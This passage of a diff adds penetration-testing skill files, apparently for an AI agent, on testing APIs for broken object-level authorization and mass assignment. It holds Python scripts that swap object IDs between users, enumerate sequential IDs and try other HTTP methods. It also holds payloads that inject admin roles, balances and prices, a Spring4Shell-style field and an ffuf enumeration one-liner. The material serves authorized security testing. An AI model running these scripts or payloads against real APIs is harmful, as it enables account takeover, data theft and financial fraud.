+    "vulnerable": resp.status_code in (200, 204)
+})
+
+# Print results
+for r in results:
+    status = "VULNERABLE" if r["vulnerable"] else "SECURE"
+    print(f"[{status}] {r['test']}: {r['endpoint']} -> HTTP {r['status']}")
+```
+
+### Step 4: Advanced BOLA Techniques
+
+Test for less obvious BOLA patterns:
+
+```python
+# Technique 1: Parameter pollution - send both IDs
+resp = requests.get(
+    f"{BASE_URL}/orders/{user_a_order_ids[0]}?order_id={user_b_order_ids[0]}",
+    headers=user_a_headers
+)
+print(f"Parameter pollution: {resp.status_code}")
+
+# Technique 2: JSON body object ID override
+resp = requests.post(
+    f"{BASE_URL}/orders/details",
+    headers=user_a_headers,
+    json={"order_id": user_b_order_ids[0]}
+)
+print(f"Body ID override: {resp.status_code}")
+
+# Technique 3: Array of IDs - include other user's IDs in batch request
+resp = requests.post(
+    f"{BASE_URL}/orders/batch",
+    headers=user_a_headers,
+    json={"order_ids": user_a_order_ids + user_b_order_ids}
+)
+print(f"Batch ID inclusion: {resp.status_code}, returned {len(resp.json().get('orders',[]))} orders")
+
+# Technique 4: Numeric ID manipulation for sequential IDs
+for offset in range(-5, 6):
+    test_id = user_a_order_ids[0] + offset
+    if test_id not in user_a_order_ids:
+        resp = requests.get(f"{BASE_URL}/orders/{test_id}", headers=user_a_headers)
+        if resp.status_code == 200:
+            owner = resp.json().get("user_id", "unknown")
+            if str(owner) != str(user_a_id):
+                print(f"BOLA: Order {test_id} belongs to user {owner}, accessible by User A")
+
+# Technique 5: Swap object ID in nested resource paths
+resp = requests.get(
+    f"{BASE_URL}/users/{user_b_id}/orders/{user_b_order_ids[0]}/invoice",
+    headers=user_a_headers
+)
+print(f"Nested resource BOLA: {resp.status_code}")
+
+# Technique 6: Method switching - GET may be blocked but PUT allowed
+for method in ['GET', 'PUT', 'PATCH', 'DELETE', 'HEAD', 'OPTIONS']:
+    resp = requests.request(
+        method,
+        f"{BASE_URL}/users/{user_b_id}/settings",
+        headers=user_a_headers,
+        json={"notifications": False} if method in ('PUT', 'PATCH') else None
+    )
+    if resp.status_code not in (401, 403, 405):
+        print(f"Method {method} on other user settings: {resp.status_code}")
+```
+
+### Step 5: Automated BOLA Detection with Autorize (Burp Suite)
+
+Configure Autorize for automated detection:
+
+1. Install Autorize from the BApp Store in Burp Suite Professional
+2. In the Autorize tab, paste User B's authentication cookie or header
+3. Configure the interception filters:
+   - Include: `.*\/api\/.*` (only API paths)
+   - Exclude: `.*\.(js|css|png|jpg)$` (skip static assets)
+4. Set the enforcement detector:
+   - Add conditions where response length or status code differs between User A and User B
+   - Mark as "enforced" if User A gets 403/401 for User B's resources
+   - Mark as "bypassed" if User A gets 200 with User B's data
+5. Browse the application as User A; Autorize automatically replays each request with User B's token
+6. Review the Autorize results table:
+   - Green = Authorization enforced (secure)
+   - Red = Authorization bypassed (BOLA vulnerability)
+   - Orange = Needs manual review (ambiguous response)
+
+### Step 6: GraphQL BOLA Testing
+
+```graphql
+# Test BOLA in GraphQL queries using node/ID relay pattern
+# User A queries User B's order by global relay ID
+query {
+  node(id: "T3JkZXI6NTAwMw==") {  # Base64 of "Order:5003" (User B's)
+    ... on Order {
+      id
+      totalAmount
+      shippingAddress {
+        street
+        city
+      }
+      items {
+        productName
+        quantity
+      }
+    }
+  }
+}
+
+# Test nested object access through relationships
+query {
+  user(id: "1002") {  # User B's ID
+    email
+    phoneNumber
+    orders {
+      edges {
+        node {
+          id
+          totalAmount
+          paymentMethod {
+            lastFourDigits
+          }
+        }
+      }
+    }
+  }
+}
+```
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| **BOLA** | Broken Object Level Authorization (OWASP API1:2023) - the API does not verify that the authenticated user has permission to access the specific object referenced by the request |
+| **IDOR** | Insecure Direct Object Reference - a closely related term where the application uses user-controllable input to directly access objects without authorization checks |
+| **Horizontal Privilege Escalation** | Accessing resources belonging to another user at the same privilege level by manipulating object identifiers |
+| **Vertical Privilege Escalation** | Accessing resources or functions restricted to a higher privilege level (e.g., regular user accessing admin endpoints) |
+| **Object ID Enumeration** | Predicting valid object identifiers by analyzing their format (sequential integers, UUID patterns, encoded values) |
+| **Autorize** | A Burp Suite extension that automates authorization testing by replaying requests with different user tokens |
+
+## Tools & Systems
+
+- **Burp Suite Professional**: Intercepting proxy for capturing and manipulating API requests with Autorize extension for automated BOLA testing
+- **OWASP ZAP**: Open-source alternative with Access Control Testing add-on for authorization boundary testing
+- **Autorize**: Burp extension that automatically detects authorization enforcement by replaying requests with different user contexts
+- **Postman**: API testing platform for crafting and replaying requests with different authentication tokens across collections
+- **ffuf**: Web fuzzer that can enumerate object IDs at scale: `ffuf -u https://api.example.com/orders/FUZZ -w ids.txt -H "Authorization: Bearer token"`
+
+## Common Scenarios
+
+### Scenario: E-Commerce API BOLA Assessment
+
+**Context**: An e-commerce platform exposes a REST API for its mobile app. The API uses sequential integer IDs for orders, users, and addresses. Two test accounts are provided: a regular customer (User A, ID 1001) and another customer (User B, ID 1002).
+
+**Approach**:
+1. Map all endpoints from the Swagger spec at `/api/docs`: identify 47 endpoints, 23 of which take object IDs
+2. Capture User A's requests for their own resources: profile, orders, addresses, payment methods, wishlist
+3. Replace User A's object IDs with User B's IDs systematically across all 23 endpoints
+4. Find that `GET /api/v1/orders/{id}` returns any order regardless of ownership (BOLA on read)
+5. Find that `PATCH /api/v1/addresses/{id}` allows modifying any user's address (BOLA on write)
+6. Find that `GET /api/v1/users/{id}/payment-methods` leaks payment card last-four digits for any user
+7. Test batch endpoint `POST /api/v1/orders/export` - accepts array of order IDs and exports all without ownership check
+8. Verify that `DELETE /api/v1/orders/{id}` correctly returns 403 for non-owned orders (authorization enforced)
+
+**Pitfalls**:
+- Only testing GET requests and missing BOLA in PUT/PATCH/DELETE methods that allow data modification or destruction
+- Assuming UUIDs prevent BOLA - UUIDs are less predictable but can be leaked in API responses, logs, or URL parameters
+- Not testing nested resource paths where authorization may be checked on the parent but not the child resource
+- Missing BOLA in bulk/batch endpoints that accept arrays of object IDs
+- Not considering that different API versions (v1 vs v2) may have different authorization implementations
+
+## Output Format
+
+```
+## Finding: Broken Object Level Authorization in Order API
+
+**ID**: API-BOLA-001
+**Severity**: High (CVSS 7.5)
+**OWASP API**: API1:2023 - Broken Object Level Authorization
+**Affected Endpoints**:
+  - GET /api/v1/orders/{id}
+  - PATCH /api/v1/addresses/{id}
+  - GET /api/v1/users/{id}/payment-methods
+  - POST /api/v1/orders/export
+
+**Description**:
+The API does not enforce object-level authorization on order retrieval,
+address modification, payment method viewing, or order export endpoints.
+An authenticated user can access or modify any other user's resources by
+substituting object IDs in the request. Sequential integer IDs make
+enumeration trivial.
+
+**Proof of Concept**:
+1. Authenticate as User A (ID 1001): POST /api/v1/auth/login
+2. Retrieve User A's order: GET /api/v1/orders/5001 -> 200 OK (legitimate)
+3. Access User B's order: GET /api/v1/orders/5003 -> 200 OK (BOLA - returns full order details)
+4. Modify User B's address: PATCH /api/v1/addresses/2002 -> 200 OK (BOLA - address changed)
+
+**Impact**:
+- Read access to all 850,000+ customer orders including shipping addresses and order contents
+- Write access to any customer's delivery address, enabling package redirection
+- Exposure of partial payment card data for all customers
+
+**Remediation**:
+1. Implement object-level authorization middleware that verifies the authenticated user owns the requested resource
+2. Use authorization checks at the data access layer: `WHERE order.user_id = authenticated_user.id`
+3. Replace sequential integer IDs with UUIDs to reduce predictability (defense in depth, not a fix alone)
+4. Add authorization tests to the CI/CD pipeline for every endpoint that accepts object IDs
+5. Implement rate limiting per user to slow enumeration attempts
+```

--- a/security/skills/testing-api-for-broken-object-level-authorization/references/api-reference.md
+++ b/security/skills/testing-api-for-broken-object-level-authorization/references/api-reference.md
@@ -1,0 +1,54 @@
+# API Reference: Testing API for Broken Object Level Authorization
+
+## BOLA Test Types
+
+| Test | Method | Severity |
+|------|--------|----------|
+| Horizontal read | GET victim's resource with attacker token | High |
+| Horizontal write | PATCH/PUT victim's resource | Critical |
+| Horizontal delete | DELETE victim's resource | Critical |
+| ID enumeration | Sequential/predictable ID access | High |
+| Method bypass | Different HTTP methods on same resource | High |
+| Batch request | Include victim IDs in batch endpoint | High |
+| Nested resource | Access child via parent swap | High |
+
+## Object ID Types
+
+| Type | Example | Predictability |
+|------|---------|---------------|
+| Sequential integer | `/orders/1042` | High |
+| UUID v4 | `/orders/550e8400-...` | Low |
+| Encoded/base64 | `/orders/MTAwMg==` | Medium |
+| Composite | `/users/42/orders/1042` | High |
+| Slug | `/profiles/john-doe` | Medium |
+
+## OWASP API1:2023 Checks
+
+| Check | Description |
+|-------|-------------|
+| Per-object authorization | Every object access checks ownership |
+| Data-layer enforcement | WHERE user_id = authenticated_user.id |
+| Rate limiting | Slow enumeration attempts |
+| UUID over sequential | Reduce predictability |
+| Batch endpoint auth | Validate all IDs in arrays |
+
+## Automated Tools
+
+| Tool | Purpose |
+|------|---------|
+| Autorize (Burp) | Automated BOLA detection |
+| OWASP ZAP Access Control | Authorization boundary testing |
+| ffuf | ID enumeration at scale |
+| Postman | Manual BOLA testing |
+
+## Python Libraries
+
+| Library | Version | Purpose |
+|---------|---------|---------|
+| `requests` | >=2.28 | HTTP API calls |
+| `json` | stdlib | Response parsing |
+
+## References
+
+- OWASP API Security: https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/
+- Autorize: https://github.com/Quitten/Autorize

--- a/security/skills/testing-api-for-broken-object-level-authorization/scripts/agent.py
+++ b/security/skills/testing-api-for-broken-object-level-authorization/scripts/agent.py
@@ -1,0 +1,198 @@
+#!/usr/bin/env python3
+"""Agent for testing APIs for Broken Object Level Authorization (BOLA).
+
+Tests REST and GraphQL APIs for IDOR/BOLA vulnerabilities by
+systematically swapping object IDs between authenticated users
+to detect missing per-object authorization checks. OWASP API1:2023.
+"""
+
+import json
+import sys
+from pathlib import Path
+from datetime import datetime
+
+try:
+    import requests
+except ImportError:
+    requests = None
+
+
+class BOLATestAgent:
+    """Tests APIs for Broken Object Level Authorization."""
+
+    def __init__(self, base_url, output_dir="./bola_test"):
+        self.base_url = base_url.rstrip("/")
+        self.output_dir = Path(output_dir)
+        self.output_dir.mkdir(parents=True, exist_ok=True)
+        self.findings = []
+
+    def _req(self, method, path, headers=None, data=None, timeout=10):
+        if not requests:
+            return None
+        try:
+            return requests.request(method, f"{self.base_url}{path}",
+                                    headers=headers, json=data, timeout=timeout)
+        except requests.RequestException:
+            return None
+
+    def get_user_objects(self, token, profile_path="/users/me", objects_path="/orders"):
+        """Retrieve a user's ID and owned object IDs."""
+        headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
+        profile_resp = self._req("GET", profile_path, headers=headers)
+        if not profile_resp or profile_resp.status_code != 200:
+            return None, []
+
+        user_data = profile_resp.json()
+        user_id = user_data.get("id")
+
+        objects_resp = self._req("GET", objects_path, headers=headers)
+        object_ids = []
+        if objects_resp and objects_resp.status_code == 200:
+            data = objects_resp.json()
+            items = data if isinstance(data, list) else data.get("items", data.get("data", data.get("orders", [])))
+            object_ids = [item.get("id") for item in items if item.get("id")]
+
+        return user_id, object_ids
+
+    def test_horizontal_read(self, attacker_token, victim_object_ids, resource_path="/orders"):
+        """Test if attacker can read victim's objects."""
+        headers = {"Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json"}
+        results = []
+        for oid in victim_object_ids:
+            resp = self._req("GET", f"{resource_path}/{oid}", headers=headers)
+            vulnerable = resp and resp.status_code == 200
+            result = {
+                "test": f"Read {resource_path}/{oid}",
+                "status": resp.status_code if resp else "error",
+                "vulnerable": vulnerable,
+            }
+            if vulnerable:
+                self.findings.append({
+                    "severity": "high",
+                    "type": "BOLA Read",
+                    "detail": f"GET {resource_path}/{oid} returns other user's data",
+                    "owasp": "API1:2023",
+                })
+            results.append(result)
+        return results
+
+    def test_horizontal_write(self, attacker_token, victim_object_ids,
+                               resource_path="/orders", payload=None):
+        """Test if attacker can modify victim's objects."""
+        headers = {"Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json"}
+        test_payload = payload or {"status": "cancelled"}
+        results = []
+        for oid in victim_object_ids:
+            resp = self._req("PATCH", f"{resource_path}/{oid}",
+                             headers=headers, data=test_payload)
+            vulnerable = resp and resp.status_code in (200, 204)
+            result = {
+                "test": f"Modify {resource_path}/{oid}",
+                "method": "PATCH",
+                "status": resp.status_code if resp else "error",
+                "vulnerable": vulnerable,
+            }
+            if vulnerable:
+                self.findings.append({
+                    "severity": "critical",
+                    "type": "BOLA Write",
+                    "detail": f"PATCH {resource_path}/{oid} modifies other user's data",
+                    "owasp": "API1:2023",
+                })
+            results.append(result)
+        return results
+
+    def test_horizontal_delete(self, attacker_token, victim_object_id,
+                                resource_path="/orders"):
+        """Test if attacker can delete victim's object."""
+        headers = {"Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json"}
+        resp = self._req("DELETE", f"{resource_path}/{victim_object_id}", headers=headers)
+        vulnerable = resp and resp.status_code in (200, 204)
+        if vulnerable:
+            self.findings.append({
+                "severity": "critical",
+                "type": "BOLA Delete",
+                "detail": f"DELETE {resource_path}/{victim_object_id} destroys other user's data",
+                "owasp": "API1:2023",
+            })
+        return {"test": f"Delete {resource_path}/{victim_object_id}",
+                "status": resp.status_code if resp else "error",
+                "vulnerable": vulnerable}
+
+    def test_id_enumeration(self, attacker_token, known_id, resource_path="/orders",
+                             range_offset=5):
+        """Test sequential ID enumeration."""
+        headers = {"Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json"}
+        accessible = []
+        for offset in range(-range_offset, range_offset + 1):
+            test_id = known_id + offset
+            if test_id == known_id:
+                continue
+            resp = self._req("GET", f"{resource_path}/{test_id}", headers=headers)
+            if resp and resp.status_code == 200:
+                accessible.append(test_id)
+        if accessible:
+            self.findings.append({
+                "severity": "high",
+                "type": "ID Enumeration",
+                "detail": f"Sequential IDs accessible: {accessible[:5]}",
+            })
+        return accessible
+
+    def test_method_bypass(self, attacker_token, victim_object_id,
+                            resource_path="/users"):
+        """Test if different HTTP methods bypass authorization."""
+        headers = {"Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json"}
+        results = []
+        for method in ["GET", "PUT", "PATCH", "DELETE", "HEAD"]:
+            data = {"name": "test"} if method in ("PUT", "PATCH") else None
+            resp = self._req(method, f"{resource_path}/{victim_object_id}",
+                             headers=headers, data=data)
+            if resp and resp.status_code not in (401, 403, 404, 405):
+                results.append({"method": method, "status": resp.status_code})
+                self.findings.append({
+                    "severity": "high",
+                    "type": "Method Bypass",
+                    "detail": f"{method} {resource_path}/{victim_object_id} -> {resp.status_code}",
+                })
+        return results
+
+    def generate_report(self, attacker_token=None, victim_ids=None):
+        read_results = []
+        write_results = []
+        if attacker_token and victim_ids:
+            read_results = self.test_horizontal_read(attacker_token, victim_ids)
+            write_results = self.test_horizontal_write(attacker_token, victim_ids)
+
+        report = {
+            "report_date": datetime.utcnow().isoformat(),
+            "base_url": self.base_url,
+            "read_tests": read_results,
+            "write_tests": write_results,
+            "findings": self.findings,
+            "total_findings": len(self.findings),
+        }
+        out = self.output_dir / "bola_test_report.json"
+        with open(out, "w") as f:
+            json.dump(report, f, indent=2)
+        print(json.dumps(report, indent=2))
+        return report
+
+
+def main():
+    if len(sys.argv) < 2:
+        print("Usage: agent.py <base_url> [--token <jwt>] [--victim-ids 1,2,3]")
+        sys.exit(1)
+    url = sys.argv[1]
+    token = None
+    victim_ids = []
+    if "--token" in sys.argv:
+        token = sys.argv[sys.argv.index("--token") + 1]
+    if "--victim-ids" in sys.argv:
+        victim_ids = [int(x) for x in sys.argv[sys.argv.index("--victim-ids") + 1].split(",")]
+    agent = BOLATestAgent(url)
+    agent.generate_report(token, victim_ids)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/testing-api-for-mass-assignment-vulnerability/SKILL.md
+++ b/security/skills/testing-api-for-mass-assignment-vulnerability/SKILL.md
@@ -1,0 +1,362 @@
+---
+name: testing-api-for-mass-assignment-vulnerability
+description: 'Tests APIs for mass assignment (auto-binding) vulnerabilities where
+  clients can modify object properties they should not have access to by including
+  additional parameters in API requests. The tester identifies writable endpoints,
+  adds undocumented fields to request bodies (role, isAdmin, price, balance), and
+  checks if the server binds these to the data model without filtering. Part of OWASP
+  API3:2023 Broken Object Property Level Authorization. Activates for requests involving
+  mass assignment testing, parameter binding abuse, auto-binding vulnerability, or
+  API over-posting.
+
+  '
+domain: cybersecurity
+subdomain: api-security
+tags:
+- api-security
+- owasp
+- mass-assignment
+- auto-binding
+- parameter-tampering
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1552.001
+- T0816
+- T0836
+---
+# Testing API for Mass Assignment Vulnerability
+
+## When to Use
+
+- Testing API endpoints that accept JSON/XML request bodies for user profile updates, registration, or object creation
+- Assessing whether the API binds all client-supplied properties to the data model without an allowlist
+- Evaluating if users can set privileged attributes (role, permissions, pricing, balance) through regular update endpoints
+- Testing APIs built with ORMs that auto-bind request parameters to database models
+- Validating that server-side input validation restricts writeable properties per user role
+
+**Do not use** without written authorization. Mass assignment testing involves modifying object properties in potentially destructive ways.
+
+## Prerequisites
+
+- Written authorization specifying target API endpoints and scope
+- Test accounts at different privilege levels
+- API documentation or OpenAPI specification to identify expected request fields
+- Burp Suite Professional for request interception and parameter injection
+- Python 3.10+ with `requests` library
+- Knowledge of the backend framework (Rails, Django, Express, Spring) to predict parameter binding behavior
+
+## Workflow
+
+### Step 1: Identify Writable Endpoints and Expected Parameters
+
+```python
+import requests
+import json
+import copy
+
+BASE_URL = "https://target-api.example.com/api/v1"
+user_headers = {"Authorization": "Bearer <user_token>", "Content-Type": "application/json"}
+
+# Identify endpoints that accept write operations
+writable_endpoints = [
+    {"method": "POST", "path": "/users/register", "expected_fields": ["email", "password", "name"]},
+    {"method": "PUT", "path": "/users/me", "expected_fields": ["name", "email", "avatar"]},
+    {"method": "PATCH", "path": "/users/me", "expected_fields": ["name", "bio"]},
+    {"method": "POST", "path": "/orders", "expected_fields": ["items", "shipping_address"]},
+    {"method": "PUT", "path": "/orders/1001", "expected_fields": ["shipping_address"]},
+    {"method": "POST", "path": "/products", "expected_fields": ["name", "description", "price"]},
+    {"method": "POST", "path": "/comments", "expected_fields": ["body", "post_id"]},
+    {"method": "PUT", "path": "/settings", "expected_fields": ["notifications", "language"]},
+]
+
+# First, get the current user state as baseline
+baseline_user = requests.get(f"{BASE_URL}/users/me", headers=user_headers).json()
+print(f"Baseline user state: {json.dumps(baseline_user, indent=2)}")
+```
+
+### Step 2: Inject Privileged Fields
+
+```python
+# Fields that should never be user-writable
+PRIVILEGE_FIELDS = {
+    "role_elevation": {"role": "admin", "user_role": "admin", "userRole": "admin",
+                       "account_type": "admin", "accountType": "admin"},
+    "admin_flags": {"is_admin": True, "isAdmin": True, "admin": True,
+                    "is_superuser": True, "isSuperuser": True, "superuser": True},
+    "permission_override": {"permissions": ["*"], "scopes": ["admin:*"],
+                           "groups": ["administrators"], "roles": ["admin"]},
+    "account_status": {"is_active": True, "isActive": True, "verified": True,
+                       "email_verified": True, "is_verified": True, "status": "active"},
+    "financial": {"balance": 99999.99, "credit": 99999, "discount": 100,
+                  "price": 0.01, "amount": 0.01},
+    "ownership": {"user_id": 1, "userId": 1, "owner_id": 1, "ownerId": 1,
+                  "created_by": 1, "createdBy": 1},
+    "internal": {"internal_notes": "test", "debug": True, "hidden": False,
+                 "is_deleted": False, "is_featured": True, "priority": 0},
+    "temporal": {"created_at": "2020-01-01", "updated_at": "2020-01-01",
+                 "createdAt": "2020-01-01", "updatedAt": "2020-01-01"},
+}
+
+def test_mass_assignment(endpoint_info):
+    """Test a writable endpoint for mass assignment vulnerabilities."""
+    method = endpoint_info["method"]
+    path = endpoint_info["path"]
+    expected = endpoint_info["expected_fields"]
+    findings = []
+
+    # Build a valid base request
+    base_body = {}
+    for field in expected:
+        if field == "email":
+            base_body[field] = "test@example.com"
+        elif field == "password":
+            base_body[field] = "SecurePass123!"
+        elif field == "name":
+            base_body[field] = "Test User"
+        elif field == "items":
+            base_body[field] = [{"product_id": 1, "quantity": 1}]
+        else:
+            base_body[field] = "test_value"
+
+    # Test each category of privileged fields
+    for category, fields in PRIVILEGE_FIELDS.items():
+        test_body = {**base_body, **fields}
+        resp = requests.request(method, f"{BASE_URL}{path}",
+                              headers=user_headers, json=test_body)
+
+        if resp.status_code in (200, 201):
+            # Verify if the fields were actually set
+            resp_data = resp.json()
+            for field_name, injected_value in fields.items():
+                actual = resp_data.get(field_name)
+                if actual is not None and str(actual) == str(injected_value):
+                    findings.append({
+                        "endpoint": f"{method} {path}",
+                        "category": category,
+                        "field": field_name,
+                        "injected_value": injected_value,
+                        "confirmed": True
+                    })
+                    print(f"[MASS ASSIGNMENT] {method} {path}: {field_name}={injected_value} accepted")
+
+    return findings
+
+all_findings = []
+for endpoint in writable_endpoints:
+    findings = test_mass_assignment(endpoint)
+    all_findings.extend(findings)
+
+print(f"\nTotal mass assignment findings: {len(all_findings)}")
+```
+
+### Step 3: Verify Assignment Through State Change
+
+```python
+def verify_mass_assignment(field_name, injected_value, verification_endpoint="/users/me"):
+    """Verify that the mass-assigned field actually persists in the database."""
+    # Re-fetch the object to confirm the field was saved
+    resp = requests.get(f"{BASE_URL}{verification_endpoint}", headers=user_headers)
+    if resp.status_code == 200:
+        current_state = resp.json()
+        actual_value = current_state.get(field_name)
+        if actual_value is not None:
+            match = str(actual_value) == str(injected_value)
+            print(f"  Verification: {field_name} = {actual_value} (injected: {injected_value}) -> {'CONFIRMED' if match else 'NOT MATCHED'}")
+            return match
+    return False
+
+# Test role elevation via profile update
+print("\n=== Role Elevation Test ===")
+# Step 1: Check current role
+me = requests.get(f"{BASE_URL}/users/me", headers=user_headers).json()
+print(f"Current role: {me.get('role', 'unknown')}")
+
+# Step 2: Attempt to set admin role
+update_resp = requests.put(f"{BASE_URL}/users/me",
+    headers=user_headers,
+    json={"name": me.get("name", "Test"), "role": "admin"})
+print(f"Update response: {update_resp.status_code}")
+
+# Step 3: Verify if role changed
+me_after = requests.get(f"{BASE_URL}/users/me", headers=user_headers).json()
+print(f"Role after update: {me_after.get('role', 'unknown')}")
+if me_after.get("role") == "admin":
+    print("[CRITICAL] Mass assignment: Role elevated to admin")
+
+# Step 4: Test admin access
+admin_resp = requests.get(f"{BASE_URL}/admin/users", headers=user_headers)
+if admin_resp.status_code == 200:
+    print("[CRITICAL] Admin access confirmed after role elevation")
+```
+
+### Step 4: Framework-Specific Testing
+
+```python
+# Ruby on Rails / Active Record style
+rails_payloads = [
+    {"user": {"name": "Test", "role": "admin", "admin": True}},  # Nested under model name
+    {"user[name]": "Test", "user[role]": "admin"},                # Form-style nested
+]
+
+# Django REST Framework style
+django_payloads = [
+    {"username": "test", "is_staff": True, "is_superuser": True},
+    {"username": "test", "groups": [1]},  # Add to admin group by ID
+]
+
+# Express.js / Mongoose style
+express_payloads = [
+    {"name": "test", "__v": 0, "_id": "000000000000000000000001"},  # Override MongoDB _id
+    {"name": "test", "$set": {"role": "admin"}},                     # MongoDB operator injection
+]
+
+# Spring Boot / JPA style
+spring_payloads = [
+    {"name": "test", "authorities": [{"authority": "ROLE_ADMIN"}]},
+    {"name": "test", "class.module.classLoader": ""},  # Spring4Shell style
+]
+
+# Test each framework-specific payload
+for payload in rails_payloads + django_payloads + express_payloads + spring_payloads:
+    resp = requests.put(f"{BASE_URL}/users/me", headers=user_headers, json=payload)
+    if resp.status_code in (200, 201):
+        print(f"[ACCEPTED] Payload: {json.dumps(payload)[:100]} -> {resp.status_code}")
+```
+
+### Step 5: Order and Financial Object Mass Assignment
+
+```python
+# Test price/amount manipulation in e-commerce APIs
+print("\n=== Financial Mass Assignment Tests ===")
+
+# Test 1: Create order with manipulated price
+order_body = {
+    "items": [{"product_id": 42, "quantity": 1}],
+    "shipping_address": {"street": "123 Test St", "city": "Test City"},
+    # Injected fields
+    "total": 0.01,
+    "subtotal": 0.01,
+    "discount_percent": 100,
+    "coupon_code": "FREEORDER",
+    "shipping_cost": 0,
+    "tax": 0,
+}
+
+resp = requests.post(f"{BASE_URL}/orders", headers=user_headers, json=order_body)
+if resp.status_code in (200, 201):
+    order = resp.json()
+    print(f"Order created - Total: {order.get('total', 'N/A')}, Discount: {order.get('discount_percent', 'N/A')}")
+    if float(order.get("total", 999)) < 1.0:
+        print("[CRITICAL] Price manipulation via mass assignment")
+
+# Test 2: Modify order status
+resp = requests.patch(f"{BASE_URL}/orders/1001",
+    headers=user_headers,
+    json={"status": "completed", "payment_status": "paid", "refund_amount": 0})
+if resp.status_code == 200:
+    print(f"[MASS ASSIGNMENT] Order status/payment fields modified")
+
+# Test 3: User balance manipulation
+resp = requests.put(f"{BASE_URL}/users/me/wallet",
+    headers=user_headers,
+    json={"amount": 10, "balance": 99999.99, "currency": "USD"})
+if resp.status_code == 200:
+    wallet = resp.json()
+    if float(wallet.get("balance", 0)) > 10000:
+        print("[CRITICAL] Wallet balance manipulation via mass assignment")
+```
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| **Mass Assignment** | Vulnerability where an API automatically binds client-supplied parameters to internal object properties without filtering, allowing modification of unintended fields |
+| **Auto-Binding** | Framework feature that maps HTTP request parameters directly to object model attributes, enabling mass assignment when no allowlist is configured |
+| **Allowlist (Whitelist)** | Server-side list of fields that the API explicitly allows clients to set, rejecting all other parameters |
+| **Blocklist (Blacklist)** | Server-side list of fields that the API explicitly blocks from client modification (less secure than allowlist) |
+| **Object Property Level Authorization** | OWASP API3:2023 - ensuring that users can only read/write object properties they are authorized to access |
+| **DTO (Data Transfer Object)** | Pattern where a separate object defines the allowed input fields, decoupling the API contract from the internal data model |
+
+## Tools & Systems
+
+- **Burp Suite Professional**: Intercept write requests and inject additional parameters using Repeater and Intruder
+- **Param Miner (Burp Extension)**: Automatically discovers hidden parameters by fuzzing request bodies and headers
+- **Arjun**: Parameter discovery tool that finds hidden HTTP parameters in API endpoints
+- **OWASP ZAP**: Active scanner with parameter injection capabilities for mass assignment detection
+- **Postman**: API testing platform for crafting requests with injected parameters and verifying responses
+
+## Common Scenarios
+
+### Scenario: SaaS User Registration Mass Assignment
+
+**Context**: A SaaS platform allows user self-registration through a REST API. The registration endpoint accepts name, email, and password. The backend uses an ORM that auto-binds request parameters to the User model.
+
+**Approach**:
+1. Register a new user with only expected fields: `POST /api/v1/register {"name":"Test","email":"test@example.com","password":"Pass123!"}` - returns user with `role: "user"`
+2. Register another user with injected role: `POST /api/v1/register {"name":"Admin","email":"admin@example.com","password":"Pass123!","role":"admin"}` - returns user with `role: "admin"`
+3. Confirm admin access by calling admin endpoints with the new account
+4. Test additional fields: `is_verified: true` bypasses email verification, `subscription_plan: "enterprise"` grants premium features
+5. Test profile update endpoint: `PUT /api/v1/users/me {"name":"Test","balance":99999}` - wallet balance modified
+
+**Pitfalls**:
+- Only testing obvious fields like "role" and missing domain-specific fields like "subscription_plan", "credit_limit", or "verified"
+- Not verifying that the injected field was actually saved (some APIs return 200 but silently ignore unknown fields)
+- Assuming that blocklisting "role" prevents mass assignment when "isAdmin", "is_admin", or "admin" may also work
+- Not testing both creation (POST) and update (PUT/PATCH) endpoints as they may have different filtering
+- Missing nested object mass assignment where fields like `user.role` or `address.verified` can be injected
+
+## Output Format
+
+```
+## Finding: Mass Assignment Enables Role Elevation via Registration API
+
+**ID**: API-MASS-001
+**Severity**: Critical (CVSS 9.8)
+**OWASP API**: API3:2023 - Broken Object Property Level Authorization
+**Affected Endpoints**:
+  - POST /api/v1/register
+  - PUT /api/v1/users/me
+  - POST /api/v1/orders
+
+**Description**:
+The API binds all client-supplied JSON fields directly to the database model
+without filtering. An attacker can include undocumented fields in registration
+and update requests to elevate their role to admin, bypass email verification,
+modify wallet balances, and manipulate order pricing.
+
+**Proof of Concept**:
+1. Register with injected role:
+   POST /api/v1/register
+   {"name":"Attacker","email":"attacker@evil.com","password":"P@ss123!","role":"admin"}
+   Response: {"id":5001,"name":"Attacker","role":"admin","is_verified":false}
+
+2. Update profile with injected balance:
+   PUT /api/v1/users/me
+   {"name":"Attacker","balance":99999.99}
+   Response: {"id":5001,"balance":99999.99}
+
+3. Create order with manipulated price:
+   POST /api/v1/orders
+   {"items":[{"product_id":42,"qty":1}],"total":0.01}
+   Response: {"order_id":8001,"total":0.01}
+
+**Impact**:
+Any user can gain administrative access, manipulate financial data,
+bypass security controls, and purchase products at arbitrary prices.
+
+**Remediation**:
+1. Implement DTOs/input schemas that explicitly define allowed fields per endpoint per role
+2. Use framework-specific mass assignment protection (Rails: strong parameters, Django: serializer fields)
+3. Never bind request parameters directly to the data model
+4. Add integration tests that verify undocumented fields are rejected
+5. Use an allowlist approach rather than blocklist for writable fields
+```

--- a/security/skills/testing-api-for-mass-assignment-vulnerability/references/api-reference.md
+++ b/security/skills/testing-api-for-mass-assignment-vulnerability/references/api-reference.md
@@ -1,0 +1,52 @@
+# API Reference: Testing API for Mass Assignment Vulnerability
+
+## Privilege Field Categories
+
+| Category | Example Fields | Impact |
+|----------|---------------|--------|
+| Role elevation | role, userRole, account_type | Admin access |
+| Admin flags | isAdmin, is_superuser | Full privileges |
+| Permissions | permissions, scopes, groups | Arbitrary access |
+| Account status | verified, is_active | Bypass verification |
+| Financial | balance, credit, discount, price | Monetary fraud |
+| Ownership | user_id, owner_id | Data theft |
+| Internal | debug, is_featured | Hidden features |
+
+## Framework-Specific Payloads
+
+| Framework | Payload Pattern |
+|-----------|----------------|
+| Rails/ActiveRecord | `{"user": {"role": "admin"}}` |
+| Django REST | `{"is_staff": true, "is_superuser": true}` |
